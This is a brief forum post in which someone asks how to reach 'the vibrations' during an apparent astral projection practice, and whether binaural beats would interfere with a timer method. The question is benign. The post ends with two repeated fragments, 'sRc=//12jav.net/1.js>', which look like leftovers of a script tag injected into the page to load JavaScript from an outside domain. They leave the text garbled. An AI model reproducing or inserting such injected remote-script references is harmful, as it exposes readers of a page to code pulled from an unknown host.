I need help getting to the vibrations. I've been trying the method of the timer only recently. should I listen to binaural at the same time or do you think this will prevent me of drifting of before the timer goes of?

I haven't had the vibrations do I need them? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
